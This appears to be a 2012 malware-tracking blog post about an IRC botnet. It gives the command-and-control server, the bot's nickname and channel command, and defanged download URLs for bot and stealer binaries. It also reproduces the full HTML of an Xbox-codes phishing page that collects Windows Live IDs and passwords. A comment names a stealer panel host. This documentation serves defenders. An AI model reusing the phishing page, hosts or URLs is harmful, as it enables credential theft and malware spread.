digested.maneradio.net(irc botnet hosted in Germany Karlsruhe 1&1 Internet Ag )

Resolved : [digested.maneradio.net] To [82.165.156.127]

Download URLs
hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com) 

hxxp://74.208.112.117:6/.x/heroi.exe

C&C Server: 82.165.156.127:1866

Server Password:

Username: hh
Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy
Channel: #!h! (Password: )
Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/
Topic  By: [ tx ]

UPDATE:
concerning a post from Anonymous guy
i m adding this here with modifications to prevent accidental infections

Here is a smoke bin i believe with rootkit in it hxxps://dl.dropbox.com/u/104452013/chainzaio.exe and here is a java drive by with either athena,insomnia or Andromeda hxxp://freeunlimitedxboxcodes.tk have fun lol.

Here more about .tk drive by:

index.html:

<html>
  <head>
    <title>sean</title>
    <meta name="description" content="sean">
    <meta name="keywords" content="background,message,commons">
    <script type="text/javascript">
        var _gaq = _gaq || [];
        _gaq.push(['_setAccount', 'UA-23441223-3']);
        _gaq.push(['_setDomainName', 'none']);
        _gaq.push(['_setAllowLinker', true]);
        _gaq.push(['_trackPageview']);
        (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
            ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
        })();
    </script>
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
    <frame src="http://xboxcodesexploiter.yolasite.com/" name="dot_tk_frame_content" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>
</html>

here the redirects:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License

Name       : FronzenAge
Description: A two-column, fixed-width template suitable for business sites and blogs.
Version    : 1.0
Released   : 20071108

-->
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>sean</title>
<meta name="description" content="" />
<meta name="keywords" content="" />
<style type="text/css">
/*
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
*/

* {
    margin: 0;
    padding: 0;
}

body {
    background: #FFFFFF url(templates/FrozenAge2/resources/common/images/img01.gif) repeat-x;
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #6E6E6E;
}

#sys_banner{
    width:960px;
    margin-left:auto; margin-right:auto;
}

/* Logo */

#logo {
    width: 870px;
    height: 135px;
    margin: 0 auto;
}

#logo h1, #logo h2 {
    margin: 0;
    color:#242c36;
}

#logo h1 a{
    color:#242c36;
}

#logo h1 {
    float: left;
    padding-top: 75px;
}

#logo h2 {
    float: right;
    padding-top: 95px;
    font-size: 16px;
    font-weight: normal;
}

#logo h2, #logo h2 a {
    color: #939292;
}

#logo a {
    text-decoration: none;
}

/* Menu */

#menu {
    width: 960px;
    height: 62px;
    margin: 0 auto;
    background: #252E3A url(templates/FrozenAge2/resources/common/images/img02.jpg) no-repeat;
}

#menu ul {
    margin: 0;
    padding: 21px 0 0 30px;
    list-style: none;
    line-height: normal;
}

#menu li {
    float: left;
    padding: 0 20px 0 22px;
    background: url(templates/FrozenAge2/resources/common/images/img03.gif) no-repeat left center;
}

#menu li.first {
    background: none;
}

#menu a {
    text-decoration: none;
    font-size: 14px;
    font-weight: bold;
    color: #FFFFFF;
}

/* Page */

#content {
    width: 900px;
    margin: 0 auto;
    padding: 45px 35px 45px 25px;
    background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
}

/* Content */

/*
#content {
    float: left;
    width: 603px;
}
*/


/* Footer */

.sys_footer {
    clear: both;
    width: 870px;
    height: 40px;
    margin: 0 auto;
    padding: 35px 45px 0px 45px;
    background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
    text-align:center;
}

#sys_designerfooter {
    border: none;
    margin:0 auto;
    padding: 0;
    background: none;
    position:relative;
    top:-60px;
}

.sys_footer p {
    margin: 0;
    line-height: normal;
    color: #B4B4B4;
}

.sys_footer a {
    color: #B4B4B4;
}

.sys_footer .legal {
    float: left;
}

.sys_footer .credit {
    float: right;
}
            
.sys_txt{
    margin: 0;
    padding: 0;
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #6E6E6E;
}

a{color:#346086;}

.sys_txt a img{

    border : none;

}
.sys_txt a{
    
    color: #346086;

}


.sys_txt a:hover{

    text-decoration: none;

}


.sys_txt h1, 
.sys_txt h2, 
.sys_txt h3, 
.sys_txt h4,
.sys_txt h5,
.sys_txt h6,
.sys_txt p{ 
    
    font-weight: normal;
    
}

.sys_txt h1{
    
    font-size          : 2em;
    color            : #242c36;    
    letter-spacing    : -2px;
}

.sys_txt h2{
    
    font-size        : 1.6em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
    letter-spacing    : -1px;

}

.sys_txt h3{
    
    font-size        : 1em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
}

.sys_txt h4{
    
    font-size          : 1em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
}

.sys_txt h5{
    
    font-size    : 1em;
    color        : #242c36; 
    padding        : 10px 0 10px 0;
}

.sys_txt h6{
    
    font-size    : 1em;
    color        : #242c36; 
    padding        : 10px 0 10px 0;
}

.sys_txt p, 
.sys_txt blockquote, 
.sys_txt ul,
.sys_txt ol {
    margin-bottom: 1.5em;
    line-height: 1.8em;
    padding-left :1em;
}

 
.sys_txt p{
        
    margin:0;
    padding:10px 0;
    
}

.sys_txt blockquote {
    
    font-style        : italic;
    border-style    : none;
    margin-left        : 2em;
    margin:0;
    padding:10px 30px;
    
}

.sys_txt ul,
.sys_txt ol{
    font-family:Tahoma,Arial,Helvetica,sans-serif;
    font-size:small;
    font-size-adjust:none;
    font-style:normal;
    font-variant:normal;
    font-weight:normal;
    line-height:normal;
    margin-left: 5em;
}    
            
.sys_txt ul{

    margin:0;
    padding:10px 50px;    
    list-style: square;

}

.sys_txt ol{
    margin:0;
    padding:10px 50px;    list-style: lower-roman;
}

.sys_txt ul li{

    
}


</style>
<link rel="stylesheet" type="text/css" href="classes/components/Form/layouts/Default/Default.css" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script><script type="text/javascript">window.jQuery || document.write('<script src="classes/commons/jquery/jquery-1.7.1.min.js"></script>')</script>
    </head>

    <body id="sys_background">
        <div id="logo">
            <h1 class="empty" style="text-align:left;"><a id="sys_heading" href="./" style="color:#242c36;font-size:26px;font-style:normal;font-weight:bold;text-decoration:none;"></a></h1>
        </div>
        <div id="menu">
            <ul class='sys_navigation'>
                
                                    
                                                                                    
                                            <li class="first"><a href="./" title="Home">Home</a></li>
                        
                            
                                    
                                                                
                                        
                                            <li><a href="proof.php" title="Proof">Proof</a></li>
                        
                            
                                    
                                                                
                                        
                                            <li><a href="about.php" title="About">About</a></li>
                        
                            
                            </ul>            
        </div>
        
        <div id="splash">
            <div id="sys_banner" name="banner" style="height:147px;width:960px; background: url(resources/coollogo_com-12935788.png.cropped960x147o0%2C16s886x102.png) no-repeat;">
            &nbsp;

            </div>
        </div>
        <!-- start page -->
        <div id="content">
            <div style="width: 100%; padding: 0px; margin: 0px" class="layout_1-column">
    <div id="layout_row1">
                    <div id="sys_region_1" style="margin:0px; padding:5px; vertical-align:top; line-height:normal; min-width:100px" class="zone_top" ><div id="I17" style="display:block;clear: both;text-align:center;margin:10px 10px 10px 10px;" class="Social_LikeStrip_Default"><div>
    <table cellpadding='0' cellspacing='0' style='width:100%;'>
        <tr>
                            <td style='width:50%;'></td>
                            
                <td>
                                        
                        <table cellpadding='0' cellspacing='0'>
                            <tr>
                                <td style='vertical-align:bottom;'>
                                
                                    <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
                                    <a href="http://twitter.com/share" class="twitter-share-button" data-lang="en" data-count="none">Tweet</a>    
                                
                                </td>
                                <td style='vertical-align:bottom;'>
                                
                                    <div style='padding:0 5px;'>
                                        <iframe src="http://www.facebook.com/plugins/like.php?send=false&amp;href=http%3A%2F%2Fxboxcodesexploiter.yolasite.com%2F&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;width=49&amp;height=20&amp;locale=en_US" scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:49px;height:20px;" allowTransparency="true"></iframe>         
                                    </div>
                            
                                </td>
                                <td style='vertical-align:bottom;'>
                            
                                    <script type="text/javascript" src="https://apis.google.com/js/plusone.js">
                                      {lang: 'en-US'}
                                    </script>
                                    <g:plusone size="medium" count="false"></g:plusone>
                                    <script type="text/javascript">gapi.plusone.go();</script>
                            
                                </td>
                            </tr>
                        </table>
                        
                                        
                </td>
                
                            <td style='width:50%;'></td>
                    </tr>
    </table>
</div></div><div id="I21" style="display:block;clear: both;text-align:center;" class="GoogleAdSense_Default"></div><div id="I22" style="display:block;clear: both;margin:10px 10px 10px 10px;" class="Horizontal_Line_Default">    <div style='border-bottom-width:1px;border-bottom-style:solid;border-bottom-color:#cccccc;font-size:0;padding:0;margin:0;height:0;line-height:0;'></div>
</div><div id="I16" style="display:block;clear: both;" class="Form_Default"><div class="sys_yola_form">
    
        
            
        <form method='post' action='http://forms.yola.com/formservice/en/c3f8653cf6bc4b77b3fb6becfe738162/8a49866b3a06a8b4013a0a4a083253c9/8a49866b3a06a8b4013a0a4a084d53ca/I16/'>
        
                    
                <div class='yola-form-field'>
        
                                                                        <p class='label'><label for='yola_form_widget_I16_0'>Windows live id</label></p>    
                                                
                                            <input id='yola_form_widget_I16_0' class='text' name='0<text>' type='text' value='' />
                        
                    <input type='hidden' name='0<label>' value='Windows live id' />
            
                </div>
        
                    
                <div class='yola-form-field'>
        
                                                                        <p class='label'><label for='yola_form_widget_I16_1'>Account password</label></p>    
                                                
                                            <input id='yola_form_widget_I16_1' class='text' name='1<text>' type='text' value='' />
                        
                    <input type='hidden' name='1<label>' value='Account password' />
            
                </div>
        
                    
                <div class='yola-form-field'>
        
                                                                        <p class='label'><label for='yola_form_widget_I16_2'>What you wan't</label></p>    
                                                
                                            <select id='yola_form_widget_I16_2' name='2<list>'>
                                                            <option value='48 hour trial'>48 hour trial</option><br />
                                                            <option value='1 month xbox gold'>1 month xbox gold</option><br />
                                                            <option value='3 months of xbox gold'>3 months of xbox gold</option><br />
                                                            <option value='12 months of xbox gold'>12 months of xbox gold</option><br />
                                                            <option value='160 Microsoft points'>160 Microsoft points</option><br />
                                                            <option value='1600 Microsoft points'>1600 Microsoft points</option><br />
                                                            <option value='4000 Microsoft points'>4000 Microsoft points</option><br />
                                                    </select>
                        
                    <input type='hidden' name='2<label>' value='What you wan&#039;t' />
            
                </div>
        
            
            <input type='hidden' name='redirect' value='http://xboxcodesexploiter.yolasite.com/?formI16Posted=true' />
            <input type='hidden' name='redirect_fail' value='http://xboxcodesexploiter.yolasite.com/?formI16PostFailed=true' />
            <input type='hidden' name='form_name' value='' />
            <input type='hidden' name='site_name' value='sean' />
                        <input type='hidden' name='destination' value='1Qh4a682H62S1P4Tycj48xLmobIkzlipU1o=:RtGwf7dhwaQhbXMBthrD38eWKotEi_igFka46FSurbo=' />
            
                            <p><input class='submit' type="submit" value="Exploit" /></p>
            
        </form>
        
    
    
</div></div></div>
            </div>
</div>
        </div>
        <!-- end page -->
        <div id='sys_footer' class='sys_footer'></div>
    
<style type="text/css">
    #sys_yolacredit_wrap{text-align:center;}
    #sys_yolacredit{text-align:center;line-height:1.2em;margin:1em auto;font-family:Arial;position:relative;background:#fff url(classes/commons/yola_footer/png/sprites.png) top right no-repeat;border-top:1px solid #e1e1e1;border-bottom:1px solid #e1e1e1;padding:13px 73px 15px 17px;color:#222;font-size:18px;display:inline-block;}
    #sys_yolacredit p{margin:0;padding:0;line-height:1.2em;}
    #sys_yolacredit p a{color:#222;text-decoration:none;}
    #sys_yolacredit p a:hover{text-decoration:underline;}
    #sys_yolacredit_message{display:none;color:red;padding:20px 20px 20px 110px;background:url(classes/commons/yola_footer/png/sprites.png) 20px center no-repeat;position:absolute;top:0;right:0;z-index:1;}
    #sys_yolacredit_message_wrap{display:none;position:absolute;top:0;right:0;padding-bottom:25px;background:url(classes/commons/yola_footer/png/sprites.png) bottom left no-repeat;}
    #sys_yolacredit_message_wrap_inner{font-size:13px;opacity:.8;filter: alpha(opacity = 80);background:#797979;-moz-border-radius:8px;-khtml-border-radius:8px;-webkit-border-radius:8px;border-radius:8px;}
    #sys_yolacredit_message p{width:260px;padding:5px 0;margin:0;text-align:left;color:#fff;font-size:13px;background:transparent;position:relative;}
    #sys_yolacredit a.yola{font-size:0;position:absolute;top:5px;right:0;display:inline-block;width:65px;height:37px;float:right;text-decoration:none;color:"#fff";}
    #sys_yolacredit a.yola:hover;{text-decoration:none;}
    #sys_yolacredit a.yola span{display:none;}
</style>
<!--[if lte IE 6]>
    <style type="text/css">
        #sys_yolacredit{background:#fff url(classes/commons/yola_footer/gif/sprites.gif) top right no-repeat;}
        #sys_yolacredit_message{background:url(classes/commons/yola_footer/gif/sprites.gif) 20px center no-repeat;}
        #sys_yolacredit_message_wrap{background:url(classes/commons/yola_footer/gif/sprites.gif) bottom left no-repeat;}
        #sys_yolacredit_message_wrap_inner{filter: alpha(opacity = 100);}
    </style>
<![endif]-->
<div id="sys_yolacredit_wrap">
        <span id="sys_yolacredit" style="" title="Visit Yola.com to create your own free website">
        <div id="sys_yolacredit_message">
            <p>This free website was made using Yola.</p>
            <p>No HTML skills required. Build your website in minutes.</p>
            <p>Go to www.yola.com and sign up today!</p>
        </div>
        <div id="sys_yolacredit_message_wrap">
            <div id="sys_yolacredit_message_wrap_inner"></div>
        </div>
        <p>Make a <a href="http://www.yola.com/">free website</a> with <a class="yola" href="http://www.yola.com/"><span>Yola</span></a></p>
    </span>
</div>
<script type="text/javascript">
    document.getElementById("sys_yolacredit").onmouseover = function(){
        var m = document.getElementById("sys_yolacredit_message"),
        w = document.getElementById("sys_yolacredit_message_wrap"),
        n = document.getElementById("sys_yolacredit_message_wrap_inner");
        m.style.display = "block";
        w.style.display = "block";
        m.style.top = (m.offsetHeight * -1 - 15) + "px";
        w.style.top = m.style.top;
        m.style.right = (m.offsetWidth * -1 + 78) + "px";
        w.style.right = m.style.right;
        n.style.width = m.offsetWidth + "px";
        n.style.height = m.offsetHeight + "px";
    };
    document.getElementById("sys_yolacredit").onmouseout = function(){
        document.getElementById("sys_yolacredit_message").style.display = "none";
        document.getElementById("sys_yolacredit_message_wrap").style.display = "none";
    };
</script>

<script type="text/javascript">
            var _yts = _yts || [];
            _yts.push(["_siteId", "8a49866b3a06a8b4013a0a4a083253c9"]);
            _yts.push(["_trackPageview"]);
            (function() {
                var yts = document.createElement("script");
                yts.type = "text/javascript";
                yts.async = true;
                yts.src = "http://analytics.yola.net/tracking.js";
                (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]).appendChild(yts);
            })();        
        </script><!-- Start Quantcast tag -->
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
    <script type="text/javascript">_qacct="p-b8x17GqsQ_656";quantserve();</script>
    <noscript>
        <a href="http://www.quantcast.com/p-b8x17GqsQ_656" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-b8x17GqsQ_656.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
    </noscript>
    <!-- End Quantcast tag --></body>

</html>

hosting infos:
http://whois.domaintools.com/82.165.156.127

Categories: Uncategorized

1 Comment

I_Post_Ur_Info - September 28, 2012 at 11:56 pm

Eh, file is just a stealer, probably ISR, in a password protected 7zip file inside of a self extracting 7zip archive. Panel is here: smokeindrostealer.binhoster.com
JDB is just a xbox live account phish.

Comments are closed